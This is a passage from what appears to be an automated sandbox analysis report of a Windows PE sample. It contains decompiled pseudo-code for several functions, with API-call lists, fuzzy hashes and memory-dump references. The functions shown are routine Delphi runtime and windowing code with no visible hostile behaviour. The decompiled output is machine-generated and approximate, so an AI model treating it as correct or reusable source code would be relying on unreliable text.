				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x409ed6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00404348(__edx);
				E004099D4(GetThreadLocale(), 0x409eec, 0x1009,  &_v12);
				if(E004087C0(0x409eec, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404600(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x47a0c0], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00408D38(_t124 + _t92 - 1, 2, 0x409ef0);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00408D38(_t124 + _t92 - 1, 4, 0x409f00);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00408D38(_t124 + _t92 - 1, 2, 0x409f18);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404608(_t122, 0x409f30);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404528();
												E00404608(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404608(_t122, 0x409f24);
										_t92 = _t92 + 1;
									}
								} else {
									E00404608(_t122, 0x409f10);
									_t92 = _t92 + 3;
								}
							} else {
								E00404608(_t122, 0x409efc);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040AA54(_t124, _t92);
							E00404858(_t124, _v8, _t92,  &_v20);
							E00404608(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x4967f4; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E0040439C(_t122, _t124);
					} else {
						while(_t92 <= E00404600(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404528();
									E00404608(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E00409EDD);
				return E0040436C( &_v24, 4);
			}























                                                                        0x00409d0c
                                                                        0x00409d11
                                                                        0x00409d12
                                                                        0x00409d13
                                                                        0x00409d14
                                                                        0x00409d15
                                                                        0x00409d19
                                                                        0x00409d1b
                                                                        0x00409d1f
                                                                        0x00409d20
                                                                        0x00409d25
                                                                        0x00409d28
                                                                        0x00409d2b
                                                                        0x00409d32
                                                                        0x00409d4a
                                                                        0x00409d62
                                                                        0x00409eac
                                                                        0x00409eae
                                                                        0x00409eb3
                                                                        0x00409eb5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00409dcb
                                                                        0x00409dd0
                                                                        0x00409dd7
                                                                        0x00409e15
                                                                        0x00409e1a
                                                                        0x00409e1c
                                                                        0x00409e3b
                                                                        0x00409e40
                                                                        0x00409e42
                                                                        0x00409e63
                                                                        0x00409e68
                                                                        0x00409e6a
                                                                        0x00409e7f
                                                                        0x00409e7f
                                                                        0x00409e81
                                                                        0x00409e87
                                                                        0x00409e8e
                                                                        0x00409e83
                                                                        0x00409e83
                                                                        0x00409e85
                                                                        0x00409e9c
                                                                        0x00409ea6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00409e85
                                                                        0x00409e6c
                                                                        0x00409e73
                                                                        0x00409e78
                                                                        0x00409e78
                                                                        0x00409e44
                                                                        0x00409e4b
                                                                        0x00409e50
                                                                        0x00409e50
                                                                        0x00409e1e
                                                                        0x00409e25
                                                                        0x00409e2a
                                                                        0x00409e2a
                                                                        0x00409eab
                                                                        0x00409eab
                                                                        0x00409dd9
                                                                        0x00409de2
                                                                        0x00409df0
                                                                        0x00409dfa
                                                                        0x00409dff
                                                                        0x00409dff
                                                                        0x00409dd7
                                                                        0x00409d68
                                                                        0x00409d68
                                                                        0x00409d6d
                                                                        0x00409d70
                                                                        0x00409d7e
                                                                        0x00409d7a
                                                                        0x00409d7a
                                                                        0x00409d7a
                                                                        0x00409d82
                                                                        0x00409dbd
                                                                        0x00409d84
                                                                        0x00409da9
                                                                        0x00409d8a
                                                                        0x00409d8a
                                                                        0x00409d8c
                                                                        0x00409d8e
                                                                        0x00409d90
                                                                        0x00409d99
                                                                        0x00409da3
                                                                        0x00409da3
                                                                        0x00409d90
                                                                        0x00409da8
                                                                        0x00409da8
                                                                        0x00409da8
                                                                        0x00409db4
                                                                        0x00409d82
                                                                        0x00409ebb
                                                                        0x00409ebd
                                                                        0x00409ec0
                                                                        0x00409ec3
                                                                        0x00409ed5

                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(?,00000000,00409ED6,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409D3B
                                                                          • Part of subcall function 004099D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID: eeee$ggg$yyyy
                                                                        • API String ID: 4232894706-1253427255
                                                                        • Opcode ID: 82683e19e74f71baa744da0d5f42b6636c256237529d645d5da37ec4d029c50c
                                                                        • Instruction ID: b6f270290c82287ec602cd9da47892ec98d791b565545ab25068ff88157d7675
                                                                        • Opcode Fuzzy Hash: 82683e19e74f71baa744da0d5f42b6636c256237529d645d5da37ec4d029c50c
                                                                        • Instruction Fuzzy Hash: B041F3743041054BC711EAA9C8816BFB395DFC5308B64483BE582F33D7EA3DAC0296AE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00443F90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 60%
                                                                        			E00443F90(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				char _v36;
				intOrPtr _t69;
				void* _t90;
				intOrPtr _t108;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				intOrPtr _t122;

				_t120 = _t121;
				_t122 = _t121 + 0xffffffe0;
				_v12 = __edx;
				_v8 = __eax;
				E00412BCC( *((intOrPtr*)(_v8 + 0x34)), 0,  &_v36,  *((intOrPtr*)(_v8 + 0x30)));
				E00444A0C(_v8);
				 *[fs:eax] = _t122;
				_v16 = E004242CC(1);
				 *[fs:eax] = _t122;
				 *((intOrPtr*)( *_v16 + 0x34))( *[fs:eax], 0x4440fb, _t120,  *[fs:eax], 0x444118, _t120, __edi, __esi, __ebx, _t119);
				 *((intOrPtr*)( *_v16 + 0x40))();
				_v20 = E004242CC(1);
				 *[fs:eax] = _t122;
				E004256E4(_v20, 1);
				 *((intOrPtr*)( *_v20 + 0x34))( *[fs:eax], 0x4440de, _t120);
				 *((intOrPtr*)( *_v20 + 0x40))();
				_t69 = _v12;
				_push(_t69);
				L00426AA0();
				_t117 = _t69 - 1;
				if(_t117 >= 0) {
					_t118 = _t117 + 1;
					_t90 = 0;
					do {
						E004202E8(E00424894(_v16),  &_v36);
						_push(0);
						_push(0);
						_push(0);
						_push(E00420730(_t74));
						_push(_t90);
						_push(_v12);
						L00426AD8();
						E004202E8(E00424894(_v20),  &_v36);
						_push(0x10);
						_push(0);
						_push(0);
						_push(E00420730(_t81));
						_push(_t90);
						_push(_v12);
						L00426AD8();
						E00443820(_v8, _t90, _v20, _v16, _t118, 0);
						_t90 = _t90 + 1;
						_t118 = _t118 - 1;
					} while (_t118 != 0);
				}
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x4440e5);
				return E004035DC(_v20);
			}

















                                                                        0x00443f91
                                                                        0x00443f93
                                                                        0x00443f99
                                                                        0x00443f9c
                                                                        0x00443fb4
                                                                        0x00443fbc
                                                                        0x00443fcc
                                                                        0x00443fdb
                                                                        0x00443fe9
                                                                        0x00443ff7
                                                                        0x00444005
                                                                        0x00444014
                                                                        0x00444022
                                                                        0x0044402a
                                                                        0x0044403a
                                                                        0x00444048
                                                                        0x0044404b
                                                                        0x0044404e
                                                                        0x0044404f
                                                                        0x00444056
                                                                        0x00444059
                                                                        0x0044405b
                                                                        0x0044405c
                                                                        0x0044405e
                                                                        0x0044406d
                                                                        0x00444072
                                                                        0x00444074
                                                                        0x00444076
                                                                        0x0044407f
                                                                        0x00444080
                                                                        0x00444084
                                                                        0x00444085
                                                                        0x00444099
                                                                        0x0044409e
                                                                        0x004440a0
                                                                        0x004440a2
                                                                        0x004440ab
                                                                        0x004440ac
                                                                        0x004440b0
                                                                        0x004440b1
                                                                        0x004440bf
                                                                        0x004440c4
                                                                        0x004440c5
                                                                        0x004440c5
                                                                        0x0044405e
                                                                        0x004440ca
                                                                        0x004440cd
                                                                        0x004440d0
                                                                        0x004440dd

                                                                        APIs
                                                                        • 73451FD0.COMCTL32(?,?,?,00000000,00444118), ref: 0044404F
                                                                          • Part of subcall function 004202E8: FillRect.USER32 ref: 00420310
                                                                        • 73452500.COMCTL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00444118), ref: 00444085
                                                                        • 73452500.COMCTL32(?,00000000,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 004440B1
                                                                          • Part of subcall function 00443820: 734520C0.COMCTL32(?,00000000,00000000,00000000,004438B2,?,00000000,004438CF), ref: 00443894
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 73452500$73451734520FillRect
                                                                        • String ID: DA
                                                                        • API String ID: 3869139703-2080325668
                                                                        • Opcode ID: 994ccba529f062b7918306dd2f5701bd664af3080c55d195bdf6221c89ee9527
                                                                        • Instruction ID: 274bc86385f0dda2e4b4f1d6e4670416b346b4c3e9b855bbcb09a17cbb89921f
                                                                        • Opcode Fuzzy Hash: 994ccba529f062b7918306dd2f5701bd664af3080c55d195bdf6221c89ee9527
                                                                        • Instruction Fuzzy Hash: 16411E74B00214AFDB01EFA6C891E9EB7F9FB89704F5144A6F800EB751CA75AD01CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043478C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E0043478C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HWND__* _t37;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr* _t52;
				long _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t64;
				intOrPtr _t65;
				intOrPtr _t69;
				intOrPtr* _t76;
				void* _t78;
				intOrPtr* _t79;
				long long _t86;

				_t86 = __fp0;
				_t79 = _t78 + 0xfffffff8;
				_t69 = __ecx;
				_t44 = __edx;
				_t76 = __eax;
				 *0x496b8c = __eax;
				_t24 =  *0x496b8c; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x496b98);
				_t26 =  *0x496b8c; // 0x0
				_t57 = 0x496b98->x; // 0x0
				 *(_t26 + 0xc) = _t57;
				_t58 =  *0x496b9c; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t58;
				 *0x496ba0 = GetCursor();
				_t28 =  *0x496b8c; // 0x0
				"SPhP;C"();
				 *0x496b94 = _t28;
				 *0x496ba4 = _t69;
				_t59 =  *0x4311cc; // 0x431218
				if(E00403768(_t76, _t59) == 0) {
					__eflags = _t44;
					if(__eflags == 0) {
						 *0x496ba8 = 0;
					} else {
						 *0x496ba8 = 1;
					}
				} else {
					_t64 = _t76;
					_t4 = _t64 + 0x44; // 0x44
					_t40 = _t4;
					_t48 =  *_t40;
					if( *((intOrPtr*)(_t40 + 8)) - _t48 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t64 + 0x20)) = 0;
						 *((intOrPtr*)(_t64 + 0x24)) = 0;
					} else {
						 *_t79 =  *((intOrPtr*)(_t64 + 0xc)) - _t48;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t40 + 8)) -  *_t40;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t64 + 0x20)) = __fp0;
						asm("wait");
					}
					_t65 =  *((intOrPtr*)(_t40 + 4));
					if( *((intOrPtr*)(_t40 + 0xc)) - _t65 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t76 + 0x28)) = 0;
						 *((intOrPtr*)(_t76 + 0x2c)) = 0;
					} else {
						_t52 = _t76;
						 *_t79 =  *((intOrPtr*)(_t52 + 0x10)) - _t65;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t40 + 0xc)) -  *((intOrPtr*)(_t40 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t52 + 0x28)) = _t86;
						asm("wait");
					}
					if(_t44 == 0) {
						 *0x496ba8 = 0;
					} else {
						 *0x496ba8 = 2;
						 *((intOrPtr*)( *_t76 + 0x30))();
					}
				}
				_t31 =  *0x496b8c; // 0x0
				 *0x496bac =  *((intOrPtr*)( *_t31 + 8))();
				_t84 =  *0x496bac;
				if( *0x496bac != 0) {
					_t36 =  *0x496b9c; // 0x0
					_t37 = GetDesktopWindow();
					_t38 =  *0x496bac; // 0x0
					E0043E5DC(_t38, _t37, _t84, _t36);
				}
				_t34 = E004035AC(1);
				 *0x496bb4 = _t34;
				if( *0x496ba8 != 0) {
					_t34 = E004344BC(0x496b98, 1);
				}
				return _t34;
			}


























                                                                        0x0043478c
                                                                        0x0043478f
                                                                        0x00434792
                                                                        0x00434794
                                                                        0x00434796
                                                                        0x00434798
                                                                        0x0043479e
                                                                        0x004347a5
                                                                        0x004347ad
                                                                        0x004347b2
                                                                        0x004347b7
                                                                        0x004347bd
                                                                        0x004347c0
                                                                        0x004347c6
                                                                        0x004347ce
                                                                        0x004347d3
                                                                        0x004347d8
                                                                        0x004347dd
                                                                        0x004347e2
                                                                        0x004347ea
                                                                        0x004347f7
                                                                        0x00434889
                                                                        0x0043488b
                                                                        0x00434896
                                                                        0x0043488d
                                                                        0x0043488d
                                                                        0x0043488d
                                                                        0x004347fd
                                                                        0x004347fd
                                                                        0x004347ff
                                                                        0x004347ff
                                                                        0x00434805
                                                                        0x0043480b
                                                                        0x0043482d
                                                                        0x0043482f
                                                                        0x00434832
                                                                        0x0043480d
                                                                        0x00434812
                                                                        0x00434815
                                                                        0x0043481d
                                                                        0x00434821
                                                                        0x00434825
                                                                        0x00434827
                                                                        0x0043482a
                                                                        0x0043482a
                                                                        0x00434838
                                                                        0x0043483f
                                                                        0x00434864
                                                                        0x00434866
                                                                        0x00434869
                                                                        0x00434841
                                                                        0x00434841
                                                                        0x00434848
                                                                        0x0043484b
                                                                        0x00434854
                                                                        0x00434858
                                                                        0x0043485c
                                                                        0x0043485e
                                                                        0x00434861
                                                                        0x00434861
                                                                        0x0043486e
                                                                        0x00434880
                                                                        0x00434870
                                                                        0x00434870
                                                                        0x0043487b
                                                                        0x0043487b
                                                                        0x0043486e
                                                                        0x0043489d
                                                                        0x004348a7
                                                                        0x004348ac
                                                                        0x004348b3
                                                                        0x004348b5
                                                                        0x004348bb
                                                                        0x004348c8
                                                                        0x004348cd
                                                                        0x004348cd
                                                                        0x004348d9
                                                                        0x004348de
                                                                        0x004348ea
                                                                        0x004348f1
                                                                        0x004348f1
                                                                        0x004348fb

                                                                        APIs
                                                                        • GetCursorPos.USER32(00496B98), ref: 004347AD
                                                                        • GetCursor.USER32(00496B98), ref: 004347C9
                                                                          • Part of subcall function 004339CC: SetCapture.USER32(00000000,?,004347DD,00496B98), ref: 004339DB
                                                                        • GetDesktopWindow.USER32 ref: 004348BB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Cursor$CaptureDesktopWindow
                                                                        • String ID: 8C
                                                                        • API String ID: 669539147-1061565219
                                                                        • Opcode ID: a4fa84824f4e5cf1615e483614cf6fe70a484704f0cac04b0c9c92be734f6c2e
                                                                        • Instruction ID: 23d7adcb388defc9bd6fa9e8aedec287cf5aea9bdfeb159da65cc808b88cf330
                                                                        • Opcode Fuzzy Hash: a4fa84824f4e5cf1615e483614cf6fe70a484704f0cac04b0c9c92be734f6c2e
                                                                        • Instruction Fuzzy Hash: CB416AB46042508FC708EF69E944656BBE1ABD8318F26C57FD449CB3A2EB35F841CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040A590, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E0040A590(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40a74b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x495ad4; // 0x4075d4
					E00406548(_t52,  &_v8);
				} else {
					_t86 =  *0x495c54; // 0x4075cc
					E00406548(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x495ba8; // 0x407574
					E00406548(_t60,  &_v372);
					E0040A1B8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004045B0( &_v340, 0x105,  &_v297);
					E00408AC8(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x495b4c; // 0x407624
					E00406548(_t82,  &_v344);
					E0040A1B8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040A752);
				E00404348( &_v372);
				E0040436C( &_v344, 3);
				return E00404348( &_v8);
			}

































                                                                        0x0040a590
                                                                        0x0040a59d
                                                                        0x0040a5a3
                                                                        0x0040a5a9
                                                                        0x0040a5af
                                                                        0x0040a5b5
                                                                        0x0040a5ba
                                                                        0x0040a5bb
                                                                        0x0040a5c0
                                                                        0x0040a5c3
                                                                        0x0040a5c9
                                                                        0x0040a5d0
                                                                        0x0040a5e4
                                                                        0x0040a5e9
                                                                        0x0040a5d2
                                                                        0x0040a5d5
                                                                        0x0040a5da
                                                                        0x0040a5da
                                                                        0x0040a5ee
                                                                        0x0040a5fb
                                                                        0x0040a607
                                                                        0x0040a6c3
                                                                        0x0040a6c9
                                                                        0x0040a6d3
                                                                        0x0040a6d9
                                                                        0x0040a6e0
                                                                        0x0040a6e6
                                                                        0x0040a6fc
                                                                        0x0040a701
                                                                        0x0040a713
                                                                        0x0040a62a
                                                                        0x0040a62d
                                                                        0x0040a633
                                                                        0x0040a64b
                                                                        0x0040a65c
                                                                        0x0040a667
                                                                        0x0040a66d
                                                                        0x0040a677
                                                                        0x0040a67d
                                                                        0x0040a684
                                                                        0x0040a68a
                                                                        0x0040a6a0
                                                                        0x0040a6a5
                                                                        0x0040a6b7
                                                                        0x0040a6bc
                                                                        0x0040a71c
                                                                        0x0040a71f
                                                                        0x0040a722
                                                                        0x0040a72d
                                                                        0x0040a73d
                                                                        0x0040a74a

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A74B), ref: 0040A5FB
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A74B), ref: 0040A61D
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileLoadModuleNameQueryStringVirtual
                                                                        • String ID: $v@$tu@
                                                                        • API String ID: 902310565-2066366626
                                                                        • Opcode ID: 9ba32f01379c519203fd593cd7103645b6150b85267e70208000b084934e0a5e
                                                                        • Instruction ID: b8250315685de19ce3eef807cd591484c91ae11c3ead26debf93d0050c9e99c4
                                                                        • Opcode Fuzzy Hash: 9ba32f01379c519203fd593cd7103645b6150b85267e70208000b084934e0a5e
                                                                        • Instruction Fuzzy Hash: B0410470900628DFDB61DF64CC85BDAB7F4AB49304F4140EAE908AB391D778AE84CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043C824, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0043C824(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
				char _t23;
				struct HWND__* _t42;
				void* _t43;
				intOrPtr _t47;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				 *((intOrPtr*)(_t59 + 4)) = __ecx;
				 *_t59 = __edx;
				_t54 = __eax;
				_t42 =  *(__eax + 0x180);
				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
					_t23 = 0;
				} else {
					_t23 = 1;
				}
				 *((char*)(_t59 + 8)) = _t23;
				if( *((char*)(_t59 + 8)) != 0) {
					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
				}
				_t56 = E00439AB4(_t54) - 1;
				if(_t56 < 0) {
					L14:
					return E00439644();
				} else {
					_t57 = _t56 + 1;
					_t58 = 0;
					do {
						_t43 = E00439A78(_t54, _t58);
						_t47 =  *0x4323f0; // 0x43243c
						if(E00403768(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
						} else {
							if( *((char*)(_t59 + 8)) == 0) {
								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
							}
						}
						_t58 = _t58 + 1;
						_t57 = _t57 - 1;
					} while (_t57 != 0);
					goto L14;
				}
			}












                                                                        0x0043c82b
                                                                        0x0043c82f
                                                                        0x0043c832
                                                                        0x0043c834
                                                                        0x0043c83c
                                                                        0x0043c848
                                                                        0x0043c84c
                                                                        0x0043c84c
                                                                        0x0043c84c
                                                                        0x0043c84e
                                                                        0x0043c857
                                                                        0x0043c86e
                                                                        0x0043c86e
                                                                        0x0043c87c
                                                                        0x0043c87f
                                                                        0x0043c8ed
                                                                        0x0043c8fb
                                                                        0x0043c881
                                                                        0x0043c881
                                                                        0x0043c882
                                                                        0x0043c884
                                                                        0x0043c88d
                                                                        0x0043c891
                                                                        0x0043c89e
                                                                        0x0043c8ac
                                                                        0x0043c8b3
                                                                        0x0043c8b8
                                                                        0x0043c8bd
                                                                        0x0043c8e4
                                                                        0x0043c8e4
                                                                        0x0043c8bd
                                                                        0x0043c8e9
                                                                        0x0043c8ea
                                                                        0x0043c8ea
                                                                        0x00000000
                                                                        0x0043c884

                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0043C83F
                                                                        • ScrollWindow.USER32 ref: 0043C86E
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0043C8E4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$ScrollVisible
                                                                        • String ID: <$C
                                                                        • API String ID: 4127837035-3423417450
                                                                        • Opcode ID: a5d84af2d4f07ff20e143fdc83744df652cb0839f96734090538049e476dac64
                                                                        • Instruction ID: 2152d0f343ca8ced43e7147e59c3894d671bac6e37dc3256dc1c566f4991c98f
                                                                        • Opcode Fuzzy Hash: a5d84af2d4f07ff20e143fdc83744df652cb0839f96734090538049e476dac64
                                                                        • Instruction Fuzzy Hash: CD21DB31604340ABC714EA69CCC0B6BB7E8AF8C305F14956EF648DB352D638ED01879A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0046CC50, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON
                                                                        Download Yara Rule
